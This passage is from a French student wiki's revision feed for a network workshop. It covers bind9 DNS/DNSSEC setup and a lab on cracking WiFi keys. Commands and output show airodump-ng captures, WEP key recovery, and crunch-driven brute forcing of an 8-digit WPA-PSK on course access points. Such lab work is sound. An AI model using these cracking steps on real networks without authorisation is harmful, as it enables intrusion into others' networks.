Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12243</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12243"/>
		<updated>2026-02-10T23:21:32Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;; //repertoire des keys&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;; //utilisation d'une politique DNSSEC&lt;br /&gt;
inline-signing yes; //activation de la signature automatique&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
[[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12242</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12242"/>
		<updated>2026-02-10T23:20:33Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Déployer le DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;; //repertoire des keys&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;; //utilisation d'une politique DNSSEC&lt;br /&gt;
inline-signing yes; //activation de la signature automatique&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
